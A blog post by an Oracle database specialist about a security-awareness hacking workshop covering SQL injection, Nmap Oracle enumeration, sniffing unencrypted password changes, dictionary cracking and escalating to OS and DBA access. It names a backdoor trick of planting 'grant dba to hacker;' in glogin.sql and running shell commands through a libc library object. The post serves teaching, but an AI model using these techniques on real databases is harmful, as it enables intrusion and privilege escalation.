Having a ball with the hacking training

Today I did my third out of four database hacking sessions at work and I have to say it again was a lot of fun. It sure did raise security awareness. My training of four hours consists of the following workshop exercises:

SQL injection
For this exercise I have a very little Java application, written by an old collegue of mine. With it you have to log on with a user and password, but both input fields have SQL injection leaks. After doing the SQL injection excercise, people usually ask “you are going to tell how this works, don’t you?”. And I of course do.

Port scanning with Nmap.
In this excercise they use the oracle-sid-brute Nmap script to find Oracle instances and oracle-enum-users to find existing users in the Oracle database.

Network sniffing with Wireshark.
“I was quite surprised that with alter user .. identified by statements, the password goes over the network unencrypted”, was one reaction to the exercise. In it I let the students change the password of SCOTT with “alter user .. identified by ..” and with the password command (it exists!) and see what goes encrypted over the network and what not.

Password cracking with woraauthbf.
I was actually amazed how incredibly fast dictionary attacks with this tool are, when I wrote and tested the exercise. With a dictionary of 2 Mb it finds dictionary passwords in 0 seconds!

Access to the OS
Here we have a database user with “just” CREATE LIBRARY privileges. And we create a library object with /lib/libc-2.x.so. And now we can run shell commands on the database server. Adding some lines with “grant dba to hacker;” to $ORACLE_HOME/sqlplus/admin/glogin.sql usually does makes the students smile. Just wait until the DBA logs in with SQL*Plus.

There’s that Java exploit that David Litchfield once showed at Blackhat 2010.


Now I’ve been at the RAC Attack at UKOUG 2011. It’s a free curriculum and platform to learn to set up a RAC database cluster. So I’ve been thinking: how about a Hack Attack platform? A platform where you can learn skills like the above. It’ll be hard for students to get around a genuine Oracle database, but otherwise there are lots of things to do with a 11.2 database. I’d like to know what you think about this, so please leave a response.


About Marcel-Jan Krijgsman

Marcel-Jan is de PR-functionaris van de Werkgroep Maan en Planeten. Hij verzorgt ook het nieuws op de Facebook pagina en deze blog.
This entry was posted in Oracle security and tagged , , , , , , . Bookmark the permalink.

1 Response to Having a ball with the hacking training

  1. Pingback: My new role as “product responsible” | Marcel-Jan's Oracle Blog

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s